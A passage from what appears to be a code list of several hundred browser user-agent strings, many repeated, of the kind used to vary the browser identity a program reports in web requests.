Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/51.0', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/26.0', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/58.0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) 